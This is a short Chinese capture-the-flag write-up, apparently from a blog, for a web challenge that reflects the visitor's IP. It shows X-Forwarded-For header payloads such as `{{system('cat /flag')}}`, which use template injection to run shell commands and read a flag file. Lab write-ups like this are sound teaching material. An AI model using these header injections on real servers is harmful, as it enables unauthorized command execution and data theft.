85 字
1 分钟
看看ip
打开网站,点击 Reveal My IP 可以显示当前 IP,用 BurpSuite 抓包分析这个过程。
发现只是调用了一个 IP 查询 API,返回结果而已。
联想到 XFF 头伪造 + 模板注入,构造:
X-Forwarded-For: {{system('ls /')}}
网页返回:
发现有 flag 字样,于是构造:
X-Forwarded-For: {{system('cat /flag')}}得到返回:
NSSCTF{220b62a8-5e58-4498-ba00-218dd328b303}
分享
如果这篇文章对你有帮助,欢迎分享给更多人!
部分信息可能已经过时
相关文章 智能推荐